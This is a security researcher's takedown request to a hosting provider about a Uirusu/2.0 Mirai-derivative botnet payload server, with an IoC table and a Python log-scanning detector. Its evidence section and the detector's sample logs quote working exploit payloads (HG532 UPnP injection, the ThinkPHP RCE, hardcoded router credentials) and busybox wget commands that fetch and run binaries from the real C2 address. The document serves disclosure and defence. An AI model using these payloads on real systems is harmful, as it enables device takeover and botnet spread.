HIGH · Disclosure May 7, 2026

Eonix 173.232.146.173 Uirusu C2

To: net-abuse@eonix.net
Cc: abuse@nuclide-research.com
Subject: Eonix customer 173.232.146.173 (rDNS zknotes.com) hosting Uirusu/2.0 IoT botnet C2 + payload distribution, takedown request


Nicholas Michael Kloster / NuClide Research nicholas@nuclide-research.com

2026-05-07

Re: Eonix customer host serving as IoT botnet C2 / payload distribution
IP: 173.232.146.173 (rDNS zknotes.com)
Severity: HIGH


I’m an independent security researcher conducting good-faith AI infrastructure research under the NuClide Research umbrella (CISA disclosures CVE-2025-4364, ICSA-25-140-11). This is an unsolicited C2-takedown request.

The host 173.232.146.173 (Eonix EONIX netblock, rDNS zknotes.com) is the active payload-distribution server for a Uirusu/2.0 IoT botnet (Mirai-derivative). The host serves arch-specific payloads at standard botnet paths (/bins/x86, /mips, /8UsA.sh shell installer) and is referenced as the propagation target by an in-the-wild sample recovered from a confirmed victim host.

Evidence

NuClide recovered a malware sample (vcimanagement.x64, SHA256 38dce395aa82fea8b4ea00de17e14f3b7db9a5ebb28e82529ed66aa2b0f44eb0, 784,152 bytes, statically linked ELF64) from a Tencent Cloud Beijing victim host (101.34.81.166, separately disclosed to abuse@tencent.com on 2026-05-06).

Static analysis of the sample reveals:

1. UPnP SOAP exploit module targeting Huawei HG532 routers (CVE-2017-17215 class):

<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
  <NewStatusURL>$(/bin/busybox wget -g 173.232.146.173 -l /tmp/binary -r /mips;
                  /bin/busybox chmod 777 * /tmp/binary;
                  /tmp/binary mips)</NewStatusURL>
  <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
</u:Upgrade>

2. Huawei HG532 admin RCE (hardcoded Digest auth):

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway",
   nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", ...

3. ThinkPHP exploit (CVE-2018-20062):

GET /index.php?s=/index/think/app/invokefunction&function=call_user_func_array
&vars[0]=shell_exec&vars[1][]='wget http://173.232.146.173/bins/x86 -O thonkphp;
   chmod 777 thonkphp; ./thonkphp ThinkPHP; rm -rf thinkphp' HTTP/1.1
User-Agent: Uirusu/2.0

4. MVPower DVR RCE:

POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
User-Agent: python-requests/2.20.0

5. Generic shell-installer drop:

/bin/busybox wget http://173.232.146.173/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

The User-Agent string Uirusu/2.0 (“uirusu” = Japanese for “virus” / ウイルス) is the botnet author’s signature and distinguishes this campaign from other Hilix-class samples.

Distinct from prior C2 disclosure

A parallel disclosure was sent yesterday (2026-05-06) to abuse@akamai.com + abuse@linode.com for a DIFFERENT botnet C2 at 172.233.96.208:3053 (Linode US, used by a Hilix-classic variant, different sample, different filename pattern, different User-Agent rotation, but same general Mirai-derivative family). Both samples were recovered from the same victim host (which had been compromised by both campaigns sequentially).

Action requested

Verify whether 173.232.146.173 is currently serving the listed paths (/bins/x86, /mips, /8UsA.sh) and, if so, request termination / null-route of the customer / removal of the malicious payloads.

The host’s rDNS zknotes.com may be a compromised legitimate customer (the name pattern fits a notes / blog domain) rather than the botnet operator’s primary infrastructure. Customer-direct outreach (rather than termination) may be appropriate if they’re an unwitting victim.

IOCs

Type                          Value
Eonix customer IP             173.232.146.173
rDNS                          zknotes.com
Payload SHA256                38dce395aa82fea8b4ea00de17e14f3b7db9a5ebb28e82529ed66aa2b0f44eb0
User-Agent signature          Uirusu/2.0
Payload paths                 /bins/x86, /mips, /8UsA.sh
Campaign tag (passed to bot)  mips, ThinkPHP
Bundled exploits              UPnP/HG532 (CVE-2017-17215), ThinkPHP (CVE-2018-20062), MVPower DVR RCE, Huawei admin Digest hardcoded
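As an added illustration (not part of the disclosure, and not NuClide's own tooling), the following Python script turns the indicators above and the request shapes from the Evidence section into a log-triage check an abuse desk or victim operator can run over web-server access logs and syslog lines. It assumes Apache combined-format access lines and free-form syslog lines; the sample lines embedded below are constructed for the demo and are not from the victim host. The script also separates campaign-specific indicators (C2 IP, payload paths, the Uirusu/2.0 User-Agent) from generic exploit request shapes, which many Mirai-derivative families share and which therefore only indicate a probe.

```python
# Added example, not part of the disclosure: flag log lines that match the
# Uirusu/2.0 indicators listed in the report (C2 IP, payload paths, User-Agent
# signature) and the request shapes of the bundled exploits.
import re
from dataclasses import dataclass

C2_IP = "173.232.146.173"        # from the disclosure's IoC table
UA_SIGNATURE = "Uirusu/2.0"      # campaign-signature User-Agent from the IoC table

# Payload paths from the IoC table. The negative lookahead stops "/mips"
# from firing on unrelated paths such as "/mipsel-toolchain.tar.gz".
PAYLOAD_PATH = re.compile(r"(/bins/x86|/mips|/8UsA\.sh)(?![\w/.-])")

# Request shapes quoted in the Evidence section. A hit here shows an exploit
# attempt against that device class, not proof that the host was compromised.
EXPLOIT_PATTERNS = {
    "thinkphp-rce": re.compile(r"invokefunction&function=call_user_func_array", re.I),
    "hg532-admin":  re.compile(r"/ctrlt/DeviceUpgrade_1"),
    "hg532-upnp":   re.compile(r"<NewStatusURL>\s*\$\("),
    "mvpower-dvr":  re.compile(r"/cgi-bin/ViewLog\.asp"),
    "busybox-drop": re.compile(r"/bin/busybox\s+wget\b"),
}


@dataclass
class Hit:
    line_no: int
    indicators: list[str]
    confidence: str  # "campaign" when a campaign-specific IoC matched, else "probe"


def classify(line: str) -> list[str]:
    """Return the indicator tags that fire on one log line (empty if none)."""
    tags = []
    if C2_IP in line:
        tags.append("c2-ip")
    if UA_SIGNATURE in line:
        tags.append("ua-uirusu")
    for path in dict.fromkeys(PAYLOAD_PATH.findall(line)):  # dedupe, keep order
        tags.append(f"payload-path:{path}")
    for name, pattern in EXPLOIT_PATTERNS.items():
        if pattern.search(line):
            tags.append(name)
    return tags


def confidence(tags: list[str]) -> str:
    """Campaign-specific IoCs tie a line to this campaign; exploit shapes alone do not."""
    specific = any(t in ("c2-ip", "ua-uirusu") or t.startswith("payload-path:") for t in tags)
    return "campaign" if specific else "probe"


def scan(lines) -> list[Hit]:
    """Scan an iterable of log lines and return one Hit per matching line."""
    hits = []
    for n, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            hits.append(Hit(n, tags, confidence(tags)))
    return hits


# Constructed sample input: lines 1-4 mimic Apache combined format, lines 5-6
# mimic syslog entries (a shell command line and an IDS-captured request body).
SAMPLE_LOG = [
    '10.0.0.5 - - [07/May/2026:10:00:01 +0000] "GET /index.php?s=/index/think/app/invokefunction'
    '&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://173.232.146.173/bins/x86'
    ' HTTP/1.1" 200 512 "-" "Uirusu/2.0"',
    '10.0.0.7 - - [07/May/2026:10:00:02 +0000] "GET /static/app.js HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/May/2026:10:00:03 +0000] "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" 401 0 "-" "-"',
    '10.0.0.8 - - [07/May/2026:10:00:04 +0000] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 200 0 "-" "python-requests/2.20.0"',
    'May  7 10:00:05 gw sh: /bin/busybox wget http://173.232.146.173/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh',
    'May  7 10:00:06 ids body: <NewStatusURL>$(/bin/busybox wget -g 173.232.146.173 -l /tmp/binary'
    ' -r /mips; /tmp/binary mips)</NewStatusURL>',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.confidence:8s} {', '.join(hit.indicators)}")
```

Feed real logs with `scan(open(path, errors="replace"))`; lines tagged "campaign" are the ones worth reporting back to the abuse desk, while "probe"-only lines mostly show background scanning and are useful for gauging exposure rather than confirming this campaign.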

Reference

Full multi-victim case study (Hilix-classic + Uirusu/2.0 cross-attribution): AI-LLM-Infrastructure-OSINT/blob/main/case-studies/commercial/multi-hilix-jupyter-campaign-2026-05-06.md

Sample is available on request via secure-share link / VirusTotal / MalwareBazaar.

Regards,
Nicholas Michael Kloster / NuClide Research
nicholas@nuclide-research.com
AI-LLM-Infrastructure-OSINT